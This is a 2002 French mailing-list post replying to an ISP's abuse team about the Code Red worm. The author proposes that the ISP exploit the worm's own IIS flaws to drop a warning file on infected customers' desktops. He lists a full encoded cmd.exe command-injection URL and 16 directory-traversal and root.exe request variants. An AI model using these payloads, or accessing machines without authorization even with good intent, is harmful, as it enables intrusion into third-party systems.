[Linux-bruxelles] Re: Code Red: un moyen de lutter activement

Philippe Teuwen philippe.teuwen at linuxbe.org
Lun 25 Mar 22:39:17 CET 2002 

Abuse wrote:
> Madame, Monsieur,
> 
> Nous avons bien reçu votre plainte et voici l'explication des problèmes que
> vous nous mentionnez.
> Les attaques que vous nous signalez sont les conséquences de la propagation du
> Virus Code Red dont vous trouverez une explication ci-dessous.
> 
> Etant donné que vous disposez d'un Firewall, votre ordinateur est protégé et ne
> coure aucun risque.
> Actuellement, nous ne savons rien entreprendre d'un côté technique afin de
> faire cesser ces alertes et c'est pourquoi votre firewall reste la meilleure
> protection.


Bonjour,

Merci d'avoir fait suite à mon premier mail.
Juste pour info, mon "firewall" s'appelle Linux et Apache...
Il y a un moyen technique pour aider les clients infectés par cette
nouvelle variante de CodeRed:

Utiliser la même faille pour déposer sur le bureau de ces personnes un
message d'alerte avec un lien vers une page de votre portail décrivant
la situation et expliquant comment désinfecter sa machine.
Ce sera nettement plus percutant que le mail que vous venez d'envoyer
d'autant plus que tous les clients n'utilisent pas leur courrier via
Skynet.

Il suffit d'avoir une machine sur le segment ADSL comme n'importe quel
client ADSL Skynet et d'écouter sur le port 80.

Dès qu'une attaque intervient (elles sont reconnaissables facilement)
un script récupère l'IP, vérifie qu'elle appartient bien à un segment
de Skynet puis emploie le même type d'URL pour déposer le fichier texte.

Un exemple non testé
L'URL doit être recomposée sur une seule ligne:

http://IP-DE-LA-MACHINE-CIBLE/_vti_bin/..%255c..
/..%255c../..%255c../winnt/system32/cmd.exe?/c+echo+%22Votre%20systeme
%20a%20une%20faille%20de%20securite%20et%20a%20ete%20infecte%20par%20
un%20virus%20type%20CodeRed%2cVeuillez%20consulter%20notre%20site:
http://www.skynet.be/CodeRed.html%22+%3e+%22c:%5cDocuments%20and%20
Settings%5cAll%20Users%5cDesktop%5cAlerteVirus.txt%22

Ce dernier est sensé déposer sur le bureau un fichier AlerteVirus.txt
avec le contenu suivant:
"Votre systeme a une faille de securite et a ete infecte par un virus 
type CodeRed, Veuillez consulter notre site: 
http://www.skynet.be/CodeRed.html"

J'ai failli mettre en place moi-même ce mécanisme via les logs de mon
serveur web Apache et un cron mais ce n'est pas à moi à faire cela et je
n'ai pas envie qu'on vienne dire que j'ai "piraté" les autres!

Evidemment, tout comme le fait CodeRed, il faut envoyer plus d'une URL
et essayer toutes les failles exploitées par CodeRed car on ne sait pas
laquelle est présente sur la machine en question.
Il y en a 16: (remplacer "dir" par la commande précédente: "echo...")

IP/scripts/root.exe?/c+dir
IP/MSADC/root.exe?/c+dir
IP/c/winnt/system32/cmd.exe?/c+dir
IP/d/winnt/system32/cmd.exe?/c+dir
IP/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
IP/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
IP/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
IP/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Il faut également essayer les différents répertoires où le bureau
Windows se trouve. L'exemple donné est valable pour un Windows2000
mais sur NT ou sur Win95/98 le bureau est ailleurs.

Je suis sûr qu'en moins d'une demi-journée de travail (scripts sous
Linux, sous NT ce sera peut-être plus difficile) cela peut être réalisé
très facilement.

Et si tout le monde (je veux dire les autres ISP) faisait de même
ce ver pourrait être éradiqué beaucoup plus rapidement car le problème
vient de tous ces utilisateurs qui ne connaissent pas bien
le web/l'informatique/Windows, qui ne savent même pas qu'ils ont
un serveur web qui tourne sur leur machine et qui ne sont même pas au
courant qu'un tel ver existe ou soit même envisageable.
Essayez juste de taper leur IP dans un browser: vous serez en face
d'une install par défaut, "Under Construction"

Si vous trouvez également que cette solution est utile, pro-active,
alors forwardez ce mail également aux autres responsables d'ISPs
accompagné éventuellement d'un script que vous auriez créé pour
l'occasion.

Bàv.

Philippe Teuwen

Plus d'informations sur la liste de diffusion Linux-bruxelles